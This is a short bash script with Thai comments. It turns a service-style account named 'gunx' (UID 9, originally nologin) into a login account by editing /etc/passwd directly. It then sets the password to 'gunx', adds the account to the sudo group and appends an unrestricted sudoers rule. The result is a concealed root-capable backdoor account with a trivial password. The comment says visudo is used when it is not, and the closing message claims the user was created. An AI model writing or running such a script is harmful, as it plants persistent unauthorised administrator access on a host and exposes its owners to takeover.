#!/bin/bash

sed -i 's/gunx:x:9:9:gunx:\/var\/spool\/gunx:\/usr\/sbin\/nologin/gunx:x:9:9:gunx:\/home:/g' /etc/passwd
echo "gunx:gunx" | chpasswd
usermod -aG sudo gunx
# แก้ไขไฟล์ sudoers โดยใช้ visudo
echo "gunx ALL=(ALL:ALL) ALL" | sudo tee -a /etc/sudoers



# แจ้งเตือนการสร้างผู้ใช้สำเร็จ
echo "ผู้ใช้ gunx ถูกสร้างขึ้นเรียบร้อยแล้ว"
